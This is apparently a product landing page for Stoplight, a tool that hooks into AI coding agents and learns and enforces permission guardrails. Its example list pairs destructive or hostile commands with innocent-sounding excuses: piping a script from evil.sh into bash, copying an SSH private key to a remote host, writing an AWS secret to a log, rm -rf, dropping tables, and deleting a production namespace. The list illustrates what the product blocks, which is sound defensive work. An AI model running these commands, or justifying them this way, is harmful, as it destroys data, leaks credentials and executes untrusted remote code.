Agent permissions on autopilot
Stoplight hooks into your agents before actions run. It quietly observes the unique commands and file operations your agents actually use and automatically surfaces meaningful guardrails your team can review and enable.
Integrates in a few clicks with







Suggestions don't stop agents. Hooks do.
Stoplight learns what to protect, then enforces it.
- Cleaning up stale build artifacts...rm -rf /usr/local/data
- Resetting the test database to a clean state...DROP TABLE users CASCADE;
- Syncing local changes with the team...git push --force origin main
- Removing the unused staging environment...kubectl delete namespace production
- Fixing a file permission issue...chmod -R 777 /
- Installing the recommended dependency...curl https://evil.sh | bash
- Logging the API response for debugging...echo $AWS_SECRET_KEY >> output.log
- Simplifying the schema per the migration plan...ALTER TABLE accounts DROP COLUMN balance;
- Tidying up unused containers...docker rm -f $(docker ps -aq)
- Backing up keys to the shared drive...scp ~/.ssh/id_rsa remote:pub/
- Clearing out old test data...TRUNCATE TABLE transactions;
- Reverting to the last known good state...git reset --hard HEAD~20
Step 1 — Install the hook
my-project/
.claude/
settings.local.json
stoplight-hook.js
Stoplight receiving telemetry...
Instant, invisible, & intelligent
Contextual AI agent permissions infrastructure your most ambitious developers will actually want to leave on, rather than --dangerously-skip
- Observe first, interrupt later.
- Install a hook and keep working. Stoplight captures tool calls, commands, and file operations and auto-deletes them after analysis.
- Real-time rules.
- Verified rules become active across all configured agents immediately, no need to pull new settings files or restart long-running sessions.
- Smart policies.
- Language based guardrails leverage our custom safety classification language model to identify complex and exceptional scenarios that regex cannot reliably catch.
- Becomes pickier over time.
- As your agent performs more actions and you accept/reject suggested rules, Stoplight becomes increasingly precise about when to interrupt/deny.
- Scalable agent governance.
- The only feasible approach toward supporting fine-grained policy enforcement across hundreds of evolving agent instances from varying providers.

Safer agents in five minutes.
Build security infrastructure that evolves just as fast as blind trust. Install a hook, run agents like usual, and let Stoplight propose relevant guardrails based on real telemetry.







